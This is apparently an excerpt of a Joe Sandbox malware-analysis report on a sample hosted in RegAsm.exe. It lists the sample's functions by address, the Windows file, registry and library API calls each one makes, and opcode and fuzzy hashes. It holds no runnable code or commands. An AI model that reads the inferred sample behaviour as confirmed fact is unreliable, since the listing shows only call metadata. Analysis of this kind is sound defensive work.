                                                                                                                                  • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                  • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 568699880-0
                                                                                                                                  • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                  • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                  • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                  • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                  • String ID: /stext
                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1023896661-0
                                                                                                                                  • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                  • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                  • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                  • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: malloc
                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                  • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                  • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                  • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                  • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2154303073-0
APIs
• SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
APIs
• FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FileModuleName
• String ID:
• API String ID: 514040917-0
APIs
• ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                  APIs
                                                                                                                                  • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFind
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
